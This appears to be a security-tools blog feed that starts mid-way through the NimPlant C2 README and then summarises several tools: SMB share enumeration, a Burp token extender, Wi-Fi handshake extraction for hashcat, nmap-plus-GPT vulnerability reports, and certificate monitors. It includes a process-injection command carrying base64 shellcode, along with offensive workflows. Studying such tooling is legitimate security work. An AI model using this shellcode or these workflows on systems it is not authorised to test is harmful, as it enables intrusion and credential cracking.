inline-execute /linux/path/to/createremotethread.x64.o go 1337 i /EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7 RxNyb2oAWUGJ2v/VY2FsYy5leGUA b

# Depending on the BOF, sometimes argument parsing is a bit different using NiCOFF
# Make sure arguments are passed as expected by the BOF (can usually be retrieved from .CNA or BOF source)
# An example:
inline-execute enum_filter_driver.x64.o go # CRASHES - default null handling does not work
inline-execute enum_filter_driver.x64.o go "" z # OK - arguments are passed as expected

Push Notifications

By default, NimPlant support push notifications via the notify_user() hook defined in server/util/notify.py. By default, it implements a simple Telegram notification which requires the TELEGRAM_CHAT_ID and TELEGRAM_BOT_TOKEN environment variables to be set before it will fire. Of course, the code can be easily extended with one's own push notification functionality. The notify_user() hook is called when a new NimPlant checks in, and receives an object with NimPlant details, which can then be pushed as desired.

Building the frontend

As a normal user, you shouldn't have to modify or re-build the UI that comes with Nimplant. However, if you so desire to make changes, install NodeJS and run an npm install while in the ui directory. Then run ui/build-ui.py. This will take care of pulling the packages, compiling the Next.JS frontend, and placing the files in the right location for the Nimplant server to use them.

A word on production use and OPSEC

NimPlant was developed as a learning project and released to the public for transparency and educational purposes. For a large part, it makes no effort to hide its intentions. Additionally, protections have been put in place to prevent abuse. In other words, do NOT use NimPlant in production engagements as-is without thorough source code review and modifications! Also remember that, as with any C2 framework, the OPSEC fingerprint of running certain commands should be considered before deployment. NimPlant can be compiled without OPSEC-risky commands by setting riskyMode to false in config.toml.

Troubleshooting

There are many reasons why Nimplant may fail to compile or run. If you encounter issues, please try the following (in order):

  • Ensure you followed the steps as described in the 'Installation' section above, double check that all dependencies are installed and the versions match
  • Ensure you followed the steps as described in the 'Compilation' section above, and that you have used the chvancooten/nimbuild docker container to rule out any dependency issues
  • Check the logs in the server/logs directory for any errors
  • Try the nim-debug compilation mode to compile with console and debug messages (.exe only) to see if any error messages are returned
  • Try compiling from another OS or with another toolchain to see if the same error occurs
  • If all of the above fails, submit an issue. Make sure to include the appropriate build information (OS, nim/python versions, dependency versions) and the outcome of the troubleshooting steps above. Incomplete issues may be closed without notice.


FindUncommonShares - A Python Equivalent Of PowerView's Invoke-ShareFinder.ps1 Allowing To Quickly Find Uncommon Shares In Vast Windows Domains

 


The script FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Active Directory Domains.

Features

  • Only requires a low privileges domain user account.
  • Automatically gets the list of all computers from the domain controller's LDAP.
  • Ignore the hidden shares (ending with $) with --ignore-hidden-shares.
  • Multithreaded connections to discover SMB shares.
  • Export results in JSON with IP, name, comment, flags and UNC path with --export-json <file.json>.
  • Export results in XLSX with IP, name, comment, flags and UNC path with --export-xlsx <file.xlsx>.
  • Export results in SQLITE3 with IP, name, comment, flags and UNC path with --export-sqlite <file.db>.
  • Iterate on LDAP result pages to get every computer of the domain, no matter the size.

Usage

$ ./FindUncommonShares.py -h
FindUncommonShares v2.4 - by @podalirius_

usage: FindUncommonShares.py [-h] [--use-ldaps] [-q] [--debug] [-no-colors] [-I] [-t THREADS] [--export-xlsx EXPORT_XLSX] [--export-json EXPORT_JSON] [--export-sqlite EXPORT_SQLITE] --dc-ip ip address [-d DOMAIN] [-u USER]
[--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] [-k]

Find uncommon SMB shares on remote machines.

optional arguments:
-h, --help show this help message and exit
--use-ldaps Use LDAPS instead of LDAP
-q, --quiet Show no information at all.
--debug Debug mode.
-no-colors Disables colored output mode
-I, --ignore-hidden-shares
Ignores hidden shares (shares ending with $)
-t THREADS, --threads THREADS
Number of threads (default: 20)

Output fi les:
--export-xlsx EXPORT_XLSX
Output XLSX file to store the results in.
--export-json EXPORT_JSON
Output JSON file to store the results in.
--export-sqlite EXPORT_SQLITE
Output SQLITE3 file to store the results in.

Authentication & connection:
--dc-ip ip address IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter
-d DOMAIN, --domain DOMAIN
(FQDN) domain to authenticate to
-u USER, --user USER user to authenticate with

Credentials:
--no-pass Don't ask for password (useful for -k)
-p PASSWORD, --password PASSWORD
Password to authenticate w ith
-H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
NT/LM hashes, format is LMhash:NThash
--aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-k, --kerberos Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line

Examples :

$ ./FindUncommonShares.py -u 'user1' -d 'LAB.local' -p 'P@ssw0rd!' --dc-ip 192.168.2.1
FindUncommonShares v2.3 - by @podalirius_

[>] Extracting all computers ...
[+] Found 2 computers.

[>] Enumerating shares ...
[>] Found 'Users' on 'DC01.LAB.local'
[>] Found 'WeirdShare' on 'DC01.LAB.local' (comment: 'Test comment')
[>] Found 'AnotherShare' on 'PC01.LAB.local'
[>] Found 'Users' on 'PC01.LAB.local
$

Each JSON entry looks like this:

{
"computer": {
"fqdn": "DC01.LAB.local",
"ip": "192.168.1.1"
},
"share": {
"name": "ADMIN$",
"comment": "Remote Admin",
"hidden": true,
"uncpath": "\\\\192.168.1.46\\ADMIN$\\",
"type": {
"stype_value": 2147483648,
"stype_flags": [
"STYPE_DISKTREE",
"STYPE_TEMPORARY"
]
}
}
}

Credits



Ator - Authentication Token Obtain and Replace Extender


The plugin is created to help automated scanning using Burp in the following scenarios:

  1. Access/Refresh token
  2. Token replacement in XML,JSON body
  3. Token replacement in cookies
    The above can be achieved using complex macro, session rules or Custom Extender in some scenarios. The rules become tricky and do not work in scenarios where the replacement text is either JSON, XML.

Key advantages:

  1. We have also achieved in-memory token replacement to avoid duplicate login requests like in both custom extender, macros/session rules.
  2. Easy UX to help obtain data (from response) and replace data (in requests) using regex. This helps achieve complex scenarios where response body is JSON, XML and the request text is also JSON, XML, form data etc.
  3. Scan speed - the scan speed increases considerably because there are no extra login requests. There is something called the "Trigger Request" which is the error condition (also includes regex) when the login requests are triggered. The error condition can include (response code = 401 and body contains "Unauthorized request")

The inspiration for the plugin is from ExtendedMacro plugin: https://github.com/FrUh/ExtendedMacro

Blogs

  1. Authentication Token Obtain and Replace (ATOR) Burp Plugin - Part1 - Single step login sequence and single token extraction
  2. Authentication Token Obtain and Replace (ATOR) Burp Plugin - Part2 - Multi step login sequence and multiple extraction

Getting Started

  1. Install Java and Maven
  2. Clone the repository
  3. Run the "mvn clean install" command in cloned repo of where pom.xml is present
  4. Take the generated jar with dependencies from the target folder

Prerequisites

  1. Make sure java environment is setup in your machine.
  2. Confgure the Burp Suite to listen the Proxy traffic
  3. Configure the java environment from extender tab of BURP

For usage with test application (Install this testing application (Tiredful application) from https://github.com/payatu/Tiredful-API)

Steps

  1. Identify the request which provides the error
  2. Identify the Error Pattern (details in section below)
  3. Obtain the data from the response using regex (see sample regex values)
  4. Replace this data on the request (use same regex as step 3 along with the variable name)

Error Pattern:

Totally there are 4 different ways you can specify the error condition.

  1. Status Code: 401, 400
  2. Error in Body: give any text from the body content (Example: Access token expired)
  3. Error in Header: give any text from header(Example: Unauthorized)
  4. Free Form: use this to give multiple condition (st=400 && bd=Access token expired || hd=Unauthorized)

Regex with samples

  1. Use Authorization: Bearer \w* to match Authorization: Bearer AXXFFPPNSUSSUSSNSUSN
  2. Use Authorization: Bearer ([\w+_-.]*) to match Authorization: Bearer AXX-F+FPPNS.USSUSSNSUSN

Break down into end to end tests

  1. Finding the Invalid request:
    • http://HOST:PORT/api/v1/exams/MQ==/ with invalid Bearer token.
  2. Identifying Error Pattern:
    • The above request will give you 401, here error condition is Status Code = 401
  3. Match regex with request data
    • Authorization: Bearer \w* - this regex will match access token which is passed.
  4. Replacement - How to replace
    • Replace the matched text(step 3 regex) with extracted value (Extraction configuration discussed in below, say varibale name is "token")
    • Authorization: Bearer token - extracted token will be replaced.

Usage with test application

Idea : Record the Tiredful application request in BURP, configure the ATOR extender, check whether token is replaced by ATOR.

  1. Open the testing application in browser which you configured with BURP
    • Generate a token from http://HOST:PORT/handle-user-token/
    • Send the request http://HOST:PORT/api/v1/exams/MQ==/ by passing Authorization Beaer token(get it from above step)
  2. Add the ATOR jar file as a extender in BURP
  3. Right Click on the request(/handle-user-token) in Proxy history and send it to Authentication Token Optain and Replace Extender
  4. Add the new entry in Extraction configuration by selecting the "access_token" value and give name as "token"(it may be any name) Note: For this application,one request is enough to generate a token.Token can also get generated after multiple requests
  5. TRIGGER CONDITION:
    • Macro steps will get executed if the condition is matched.
    • After execution of steps, replace the incoming request by taking values from "Pattern" and "Replacement Area" if specified.
    • For our testing,
      • Error condition is 401(Status Code)
      • Pattern is "Authorization: Bearer \w*" (Specify the regex Pattern how you want to replace with extraction values)
      • Replacement Area is "Authentication: Bearer <NAME which you gave in STEP 4>"
    • Click on "Add" Button.
  6. For this example, one replacement is enough to make the incoming request as valid but you can add mutiple replacement for a single condition.
  7. Hit the invalid request from Repeater and check the req/res flows in either FLOW/Logger++
    • Invalid Bearer token(http://HOST:PORT/api/v1/exams/MQ==/) from Repeater makes the response as 401.
    • Extender will match this condition and start running the recorded steps, extract the "access_token"
    • Replace the access token(from step ii) in actual response(from Repeater) and makes this invalid request as valid.
    • In the repeater console, you see 200 OK response.
  8. Do the Step7 again and check the flow
    • This time extender will not invoke the steps because existing token is valid and so it uses that.

Built With

  • SWING - Used to add panel

Contributing

Please read CONTRIBUTING.md for details on our code of conduct, and the process for submitting pull requests to us.

Versioning

v1.0

Authors

Authors from Synopsys - Ashwath Reddy (@ka3hk) and Manikandan Rajappan (@rmanikdn)

License

This software is released by Synopsys under the MIT license.

Acknowledgments

  • https://github.com/FrUh/ExtendedMacro ExtendedMacro was a great start - we have modified the UI to handle more complex scenarios. We have also fixed bugs and improved speed by replacing tokens in memory.

Demo Video

ATOR v2.0.0:

UI Panel was splitted into 4 different configuration. Check out the code from v2 or use the executable from v2/bin.

  1. Error Condition - Find the error condition req/res and add trigger condition [Can be statuscode/text in body content/text in header]. Multiple condition can also be added.
  2. Obtain Token: Find all the req/res to get the token. It can be single or multiple request (do replacement accordingly)
  3. Error Condition Replacement: Mark the trigger condition and also mark the place on request where replacement needs to taken (map the extraction)
  4. Preview: Dry run it before configure for scan.


Wifi_Db - Script To Parse Aircrack-ng Captures To A SQLite Database


Script to parse Aircrack-ng captures into a SQLite database and extract useful information like handshakes (in 22000 hashcat format), MGT identities, interesting relations between APs, clients and it's Probes, WPS information and a global view of all the APs seen.

           _   __  _             _  _     
__ __(_) / _|(_) __| || |__
\ \ /\ / /| || |_ | | / _` || '_ \
\ V V / | || _|| | | (_| || |_) |
\_/\_/ |_||_| |_| _____ \__,_||_.__/
|_____|
by r4ulcl

Features

  • Displays if a network is cloaked (hidden) even if you have the ESSID.
  • Shows a detailed table of connected clients and their respective APs.
  • Identifies client probes connected to APs, providing insight into potential security risks usin Rogue APs.
  • Extracts handshakes for use with hashcat, facilitating password cracking.
  • Displays identity information from enterprise networks, including the EAP method used for authentication.
  • Generates a summary of each AP group by ESSID and encryption, giving an overview of the security status of nearby networks.
  • Provides a WPS info table for each AP, detailing information about the Wi-Fi Protected Setup configuration of the network.
  • Logs all instances when a client or AP has been seen with the GPS data and timestamp, enabling location-based analysis.
  • Upload files with capture folder or file. This option supports the use of wildcards (*) to select multiple files or folders.
  • Docker version in Docker Hub to avoid dependencies.
  • Obfuscated mode for demonstrations and conferences.
  • Possibility to add static GPS data.

Install

From DockerHub (RECOMMENDED)

docker pull r4ulcl/wifi_db

Manual installation

Debian based systems (Ubuntu, Kali, Parrot, etc.)

Dependencies:

  • python3
  • python3-pip
  • tshark
  • hcxtools
sudo apt install tshark
sudo apt install python3 python3-pip

git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
sudo make install
cd ..

Installation

git clone https://github.com/r4ulcl/wifi_db
cd wifi_db
pip3 install -r requirements.txt

Arch

Dependencies:

  • python3
  • python3-pip
  • tshark
  • hcxtools
sudo pacman -S wireshark-qt
sudo pacman -S python-pip python

git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
sudo make install
cd ..

Installation

git clone https://github.com/r4ulcl/wifi_db
cd wifi_db
pip3 install -r requirements.txt

Usage

Scan with airodump-ng

Run airodump-ng saving the output with -w:

sudo airodump-ng wlan0mon -w scan --manufacturer --wps --gpsd

Create the SQLite database using Docker

#Folder with captures
CAPTURESFOLDER=/home/user/wifi

# Output database
touch db.SQLITE

docker run -t -v $PWD/db.SQLITE:/db.SQLITE -v $CAPTURESFOLDER:/captures/ r4ulcl/wifi_db
  • -v $PWD/db.SQLITE:/db.SQLITE: To save de output in current folder db.SQLITE file
  • -v $CAPTURESFOLDER:/captures/: To share the folder with the captures with the docker

Create the SQLite database using manual installation

Once the capture is created, we can create the database by importing the capture. To do this, put the name of the capture without format.

python3 wifi_db.py scan-01

In the event that we have multiple captures we can load the folder in which they are directly. And with -d we can rename the output database.

python3 wifi_db.py -d database.sqlite scan-folder

Open database

The database can be open with:

Below is an example of a ProbeClientsConnected table.

Arguments

usage: wifi_db.py [-h] [-v] [--debug] [-o] [-t LAT] [-n LON] [--source [{aircrack-ng,kismet,wigle}]] [-d DATABASE] capture [capture ...]

positional arguments:
capture capture folder or file with extensions .csv, .kismet.csv, .kismet.netxml, or .log.csv. If no extension is provided, all types will
be added. This option supports the use of wildcards (*) to select multiple files or folders.

options:
-h, --help show this help message and exit
-v, --verbose increase output verbosity
--debug increase output verbosity to debug
-o, --obfuscated Obfuscate MAC and BSSID with AA:BB:CC:XX:XX:XX-defghi (WARNING: replace all database)
-t LAT, --lat LAT insert a fake lat in the new elements
-n LON, --lon LON insert a fake lon i n the new elements
--source [{aircrack-ng,kismet,wigle}]
source from capture data (default: aircrack-ng)
-d DATABASE, --database DATABASE
output database, if exist append to the given database (default name: db.SQLITE)

Kismet

TODO

Wigle

TODO

Database

wifi_db contains several tables to store information related to wireless network traffic captured by airodump-ng. The tables are as follows:

  • AP: This table stores information about the access points (APs) detected during the captures, including their MAC address (bssid), network name (ssid), whether the network is cloaked (cloaked), manufacturer (manuf), channel (channel), frequency (frequency), carrier (carrier), encryption type (encryption), and total packets received from this AP (packetsTotal). The table uses the MAC address as a primary key.

  • Client: This table stores information about the wireless clients detected during the captures, including their MAC address (mac), network name (ssid), manufacturer (manuf), device type (type), and total packets received from this client (packetsTotal). The table uses the MAC address as a primary key.

  • SeenClient: This table stores information about the clients seen during the captures, including their MAC address (mac), time of detection (time), tool used to capture the data (tool), signal strength (signal_rssi), latitude (lat), longitude (lon), altitude (alt). The table uses the combination of MAC address and detection time as a primary key, and has a foreign key relationship with the Client table.

  • Connected: This table stores information about the wireless clients that are connected to an access point, including the MAC address of the access point (bssid) and the client (mac). The table uses a combination of access point and client MAC addresses as a primary key, and has foreign key relationships with both the AP and Client tables.

  • WPS: This table stores information about access points that have Wi-Fi Protected Setup (WPS) enabled, including their MAC address (bssid), network name (wlan_ssid), WPS version (wps_version), device name (wps_device_name), model name (wps_model_name), model number (wps_model_number), configuration methods (wps_config_methods), and keypad configuration methods (wps_config_methods_keypad). The table uses the MAC address as a primary key, and has a foreign key relationship with the AP table.

  • SeenAp: This table stores information about the access points seen during the captures, including their MAC address (bssid), time of detection (time), tool used to capture the data (tool), signal strength (signal_rssi), latitude (lat), longitude (lon), altitude (alt), and timestamp (bsstimestamp). The table uses the combination of access point MAC address and detection time as a primary key, and has a foreign key relationship with the AP table.

  • Probe: This table stores information about the probes sent by clients, including the client MAC address (mac), network name (ssid), and time of probe (time). The table uses a combination of client MAC address and network name as a primary key, and has a foreign key relationship with the Client table.

  • Handshake: This table stores information about the handshakes captured during the captures, including the MAC address of the access point (bssid), the client (mac), the file name (file), and the hashcat format (hashcat). The table uses a combination of access point and client MAC addresses, and file name as a primary key, and has foreign key relationships with both the AP and Client tables.

  • Identity: This table represents EAP (Extensible Authentication Protocol) identities and methods used in wireless authentication. The bssid and mac fields are foreign keys that reference the AP and Client tables, respectively. Other fields include the identity and method used in the authentication process.

Views

  • ProbeClients: This view selects the MAC address of the probe, the manufacturer and type of the client device, the total number of packets transmitted by the client, and the SSID of the probe. It joins the Probe and Client tables on the MAC address and orders the results by SSID.

  • ConnectedAP: This view selects the BSSID of the connected access point, the SSID of the access point, the MAC address of the connected client device, and the manufacturer of the client device. It joins the Connected, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

  • ProbeClientsConnected: This view selects the BSSID and SSID of the connected access point, the MAC address of the probe, the manufacturer and type of the client device, the total number of packets transmitted by the client, and the SSID of the probe. It joins the Probe, Client, and ConnectedAP tables on the MAC address of the probe, and filters the results to exclude probes that are connected to the same SSID that they are probing. The results are ordered by the SSID of the probe.

  • HandshakeAP: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the handshake, the manufacturer of the client device, the file containing the handshake, and the hashcat output. It joins the Handshake, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

  • HandshakeAPUnique: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the handshake, the manufacturer of the client device, the file containing the handshake, and the hashcat output. It joins the Handshake, AP, and Client tables on the BSSID and MAC address, respectively, and filters the results to exclude handshakes that were not cracked by hashcat. The results are grouped by SSID and ordered by BSSID.

  • IdentityAP: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the identity request, the manufacturer of the client device, the identity string, and the method used for the identity request. It joins the Identity, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

  • SummaryAP: This view selects the SSID, the count of access points broadcasting the SSID, the encryption type, the manufacturer of the access point, and whether the SSID is cloaked. It groups the results by SSID and orders them by the count of access points in descending order.

TODO

  • Aircrack-ng

  • All in 1 file (and separately)

  • Kismet

  • Wigle

  • install

  • parse all files in folder -f --folder

  • Fix Extended errors, tildes, etc (fixed in aircrack-ng 1.6)

  • Support bash multi files: "capture*-1*"

  • Script to delete client or AP from DB (mac). - (Whitelist)

  • Whitelist to don't add mac to DB (file whitelist.txt, add macs, create DB)

  • Overwrite if there is new info (old ESSID='', New ESSID='WIFI')

  • Table Handhsakes and PMKID

  • Hashcat hash format 22000

  • Table files, if file exists skip (full path)

  • Get HTTP POST passwords

  • DNS querys


This program is a continuation of a part of: https://github.com/T1GR3S/airo-heat

Author

  • Raúl Calvo Laorden (@r4ulcl)

License

GNU General Public License v3.0



GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


This is a Proof Of Concept application that demostrates how AI can be used to generate accurate results for vulnerability analysis and also allows further utilization of the already super useful ChatGPT.

Requirements

  • Python 3.10
  • All the packages mentioned in the requirements.txt file
  • OpenAi api

Usage

  • First Change the "API__KEY" part of the code with OpenAI api key
openai.api_key = "__API__KEY" # Enter your API key
  • second install the packages
pip3 install -r requirements.txt
or
pip install -r requirements.txt
  • run the code python3 gpt_vuln.py <> or if windows run python gpt_vuln.py <>

Supported in both windows and linux

Understanding the code

Profiles:

Parameter Return data Description Nmap Command
p1 json Effective Scan -Pn -sV -T4 -O -F
p2 json Simple Scan -Pn -T4 -A -v
p3 json Low Power Scan -Pn -sS -sU -T4 -A -v
p4 json Partial Intense Scan -Pn -p- -T4 -A -v
p5 json Complete Intense Scan -Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln

The profile is the type of scan that will be executed by the nmap subprocess. The Ip or target will be provided via argparse. At first the custom nmap scan is run which has all the curcial arguments for the scan to continue. nextly the scan data is extracted from the huge pile of data which has been driven by nmap. the "scan" object has a list of sub data under "tcp" each labled according to the ports opened. once the data is extracted the data is sent to openai API davenci model via a prompt. the prompt specifically asks for an JSON output and the data also to be used in a certain manner.

The entire structure of request that has to be sent to the openai API is designed in the completion section of the Program.

vulnerability analysis of {} and return a vulnerabilty report in json".format(analize) # A structure for the request completion = openai.Completion.create( engine=model_engine, prompt=prompt, max_tokens=1024, n=1, stop=None, ) response = completion.choices[0].text return response" dir="auto">
def profile(ip):
nm.scan('{}'.format(ip), arguments='-Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln')
json_data = nm.analyse_nmap_xml_scan()
analize = json_data["scan"]
# Prompt about what the quary is all about
prompt = "do a vulnerability analysis of {} and return a vulnerabilty report in json".format(analize)
# A structure for the request
completion = openai.Completion.create(
engine=model_engine,
prompt=prompt,
max_tokens=1024,
n=1,
stop=None,
)
response = completion.choices[0].text
return response

Advantages

  • Can be used in developing a more advanced systems completly made of the API and scanner combination
  • Can increase the effectiveness of the final system
  • Highly productive when working with models such as GPT3


Kali Linux 2023.1 - Penetration Testing and Ethical Hacking Linux Distribution


Time for another Kali Linux release! – Kali Linux 2023.1. This release has various impressive updates.

he changelog summary since the 2022.4 release from December:


More info here.


CertWatcher - A Tool For Capture And Tracking Certificate Transparency Logs, Using YAML Templates Based DSL


CertWatcher is a tool for capture and tracking certificate transparency logs, using YAML templates. The tool helps to detect and analyze phishing websites and regular expression patterns, and is designed to make it easy to use for security professionals and researchers.



Certwatcher continuously monitors the certificate data stream and checks for suspicious patterns or malicious activity. Certwatcher can also be customized to detect specific phishing patterns and combat the spread of malicious websites.

Get Started

Certwatcher allows you to use custom templates to display the certificate information. We have some public custom templates available from the community. You can find them in our repository.

Useful Links

Contribution

If you want to contribute to this project, follow the steps below:

  • Fork this repository.
  • Create a new branch with your feature: git checkout -b my-new-feature
  • Make changes and commit the changes: git commit -m 'Adding a new feature'
  • Push to the original branch: git push origin my-new-feature
  • Open a pull request.

Authors



CertVerify - A Scanner That Files With Compromised Or Untrusted Code Signing Certificates


The CertVerify is a tool designed to detect executable files (exe, dll, sys) that have been signed with untrusted or leaked code signing certificates. The purpose of this tool is to identify potentially malicious files that have been signed using certificates that have been compromised, stolen, or are not from a trusted source.

Why is this tool needed?

Executable files signed with compromised or untrusted code signing certificates can be used to distribute malware and other malicious software. Attackers can use these files to bypass security controls and to make their malware appear legitimate to victims. This tool helps to identify these files so that they can be removed or investigated further.

As a continuous project of the previous malware scanner, i have created such a tool. This type of tool is also essential in the event of a security incident response.

Scope of use and limitations

  1. The CertVerify cannot guarantee that all files identified as suspicious are necessarily malicious. It is possible for files to be falsely identified as suspicious, or for malicious files to go undetected by the scanner.

  2. The scanner only targets code signing certificates that have been identified as malicious by the public community. This includes certificates extracted by malware analysis tools and services, and other public sources. There are many unverified malware signing certificates, and it is not possible to obtain the entire malware signing certificate the tool can only detect some of them. For additional detection, you have to extract the certificate's serial number and fingerprint information yourself and add it to the signatures.

  3. The scope of this tool does not include the extraction of code signing information for special rootkits that have already preempted and operated under the kernel, such as FileLess bootkits, or hidden files hidden by high-end technology. In other words, if you run this tool, it will be executed at the user level. Similar functions at the kernel level are more accurate with antirootkit or EDR. Please keep this in mind and focus on the ideas and principles... To implement the principle that is appropriate for the purpose of this tool, you need to development a driver(sys) and run it into the kernel with NT\SYSTEM privileges.

  4. Nevertheless, if you want to run this tool in the event of a Windows system intrusion incident, and your purpose is sys files, boot into safe mode or another boot option that does not load the extra driver(sys) files (load only default system drivers) of the Windows system before running the tool. I think this can be a little more helpful.

  5. Alternatively, mount the Windows system disk to the Linux and run the tool in the Linux environment. I think this could yield better results.

Features

  • File inspection based on leaked or untrusted certificate lists.
  • Scanning includes subdirectories.
  • Ability to define directories to exclude from scanning.
  • Supports multiprocessing for faster job execution.
  • Whitelisting based on certificate subject (e.g., Microsoft subject certificates are exempt from detection).
  • Option to skip inspection of unsigned files for faster scans.
  • Easy integration with SIEM systems such as Splunk by attaching scan_logs.
  • Easy-to-handle and customizable code and function structure.

And...

  • Please let me know if any changes are required or if additional features are needed.
  • If you find this helpful, please consider giving it a "star"
    to support further improvements.

v1.0.0

Scan result_log

datetime="2023-03-06 20:17:57",scan_id="87ea3e7b-dedc-4016-a43e-5c83f8d27c6e",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\chrome.exe",signature_hash="sha256",serial_number="0e4418e2dede36dd2974c3443afb5ce5",thumbprint="7d3d117664f121e592ef897973ef9c159150e3d736326e9cd2755f71e0febc0c",subject_name="Google LLC",issu   er_name="DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1",file_created_at="2023-03-03 23:20:41",file_modified_at="2022-04-14 06:17:04"
datetime="2023-03-06 20:17:58",scan_id="87ea3e7b-dedc-4016-a43e-5c83f8d27c6e",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineLauncher.exe",signature_hash="sha256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumbprint="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-03-10 18:00:10"
datetime="2023-03-06 20:17:58",scan_id="87ea3e7b-dedc-4016-a43e-5c83f8d27c6e",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineUpdater.exe",signature_hash="sha256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumb print="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-06 10:06:28"
datetime="2023-03-06 20:17:59",scan_id="87ea3e7b-dedc-4016-a43e-5c83f8d27c6e",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\TWOD_Launcher.exe",signature_hash="sha256",serial_number="073637b724547cd847acfd28662a5e5b",thumbprint="281734d4592d1291d27190709cb510b07e22c405d5e0d6119b70e73589f98acf",subject_name="DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA",issuer_name="DigiCert Trusted Root G4",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-07 09:14:08"
datetime="2023-03-06 20:18:00",scan_id="87ea3e7b-dedc-4016-a43e-5c83f8d27c6e",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject \certverify\test\VBoxSup.sys",signature_hash="sha256",serial_number="2f451139512f34c8c528b90bca471f767b83c836",thumbprint="3aa166713331d894f240f0931955f123873659053c172c4b22facd5335a81346",subject_name="VirtualBox for Legacy Windows Only Timestamp Kludge 2014",issuer_name="VirtualBox for Legacy Windows Only Timestamp CA",file_created_at="2023-03-03 23:20:43",file_modified_at="2022-10-11 08:11:56"
datetime="2023-03-06 20:31:59",scan_id="f71277c5-ed4a-4243-8070-7e0e56b0e656",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\chrome.exe",signature_hash="sha256",serial_number="0e4418e2dede36dd2974c3443afb5ce5",thumbprint="7d3d117664f121e592ef897973ef9c159150e3d736326e9cd2755f71e0febc0c",subject_name="Google LLC",issuer_name="DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1",file_created_at="2023-03-03 23:20:41",file_modified_at="2022-04-14 06:17:04"
datetime="2023-03-06 20:32:00",scan_id="f71277c 5-ed4a-4243-8070-7e0e56b0e656",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineLauncher.exe",signature_hash="sha256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumbprint="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-03-10 18:00:10"
datetime="2023-03-06 20:32:00",scan_id="f71277c5-ed4a-4243-8070-7e0e56b0e656",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\LineUpdater.exe",signature_hash="sha256",serial_number="0d424ae0be3a88ff604021ce1400f0dd",thumbprint="b3109006bc0ad98307915729e04403415c83e3292b614f26964c8d3571ecf5a9",subject_name="DigiCert Timestamp 2021",issuer_name="DigiCert SHA2 Assured ID Timestamping CA",file_created_at="2023-03-03 23:20:42",file_modified_at="2022-04-06 10:06:28"
